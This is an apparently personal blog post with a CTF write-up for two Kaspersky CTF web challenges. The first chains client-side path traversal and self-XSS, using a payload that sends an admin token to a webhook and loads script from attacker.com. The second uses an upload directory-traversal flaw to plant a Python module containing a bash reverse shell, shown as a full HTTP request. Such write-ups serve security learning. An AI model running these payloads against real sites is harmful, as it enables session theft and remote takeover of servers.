Profile

i love cat

as3617

Kaspersky{CTF} - Bubble: rerevenge, Peach Investor writeup

Bubble: ReRevenge

Vulnerability

  1. Client Side Path Traversal
    image
    e and t are controlled by Path parameters.

image


As shown in the picture above, we can manipulate the api requested path using path traversal.

  1. Self XSS
    image
    When writing a post, self-xss occurs in the preview function.

Chainning

Admin bot works as follows.

  1. Register
  2. add post with flag
  3. visit post
  4. write comment with post's author name
  5. back to dashboard, and write new post

In 4th steps, Client Side Path traversal vulnability also occurs.

So we can save draft with our username.

At this time, if our username contains XSS payloads, we can get xss when admin bot perform course 5.

Payload

  1. Change username to below payloadsaf.js -> navigator.sendBeacon("https://webhook",localStorage.getItem("DiarrheaTokenBearerInLocalStorageForSecureRequestsContactAdminHeKnowsHotToUseWeHaveManyTokensHereSoThisOneShouldBeUnique"))
  2. @[youtube srcdoc=<script/src=//attacker.com/af.js></script>]
  3. report url
  4. https://bubble-tea-rerevenge.task.sasc.tf/post/USER_UUID/posts/506%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2fapi%2fdrafts%2fsave%23
  5. get flag using admin session token

FLAG : kaspersky{6ruh_6um6l3_1s_n0_m0r3}

Peach Investor

Vulnerability

  1. File upload vuln
    image

We can upload any file without restriction.
And, no validation exists for source parameter, we can upload files to any location by directory traversal.

Exploit

image

In docker container, I saw that the celery scheduler import a strange module (billiard).
We can use this to get shell.

If we create a directory called billiard, and upload __init__py with a reverse shell in it, our code will run when the scheduler executed.

Payload

POST /upload?source=../billiard HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en,ko;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 269
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Host: 409fe342-33f9-4f27-b317-398f174974ee.kit.sasc.tf
Origin: http://localhost:8000
Pragma: no-cache
Referer: http://localhost:8000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

------WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Content-Disposition: form-data; name="file"; filename="__init__.py"
Content-Type: application/json

import os
os.system("/bin/bash -c 'bash -i > /dev/tcp/IP/1234 0>&1'")
------WebKitFormBoundaryBB3U3Fw3boGnqJKQ--

FLAG: kaspersky{p41d_w17h_c4sh_4nd_3nd3d_up_s0_s35h}

'ctf writeup' 카테고리의 다른 글

DiceCTF 2023 - unfinished  (0) 2023.02.06
Balsn CTF 2022 2linenodejs writeup  (0) 2022.09.07
2022 Fall GoN Open Qual CTF writeup  (2) 2022.09.01
LINE CTF 2022 web writeup  (0) 2022.03.27
Codegate 2022 Preliminary writeup  (0) 2022.02.27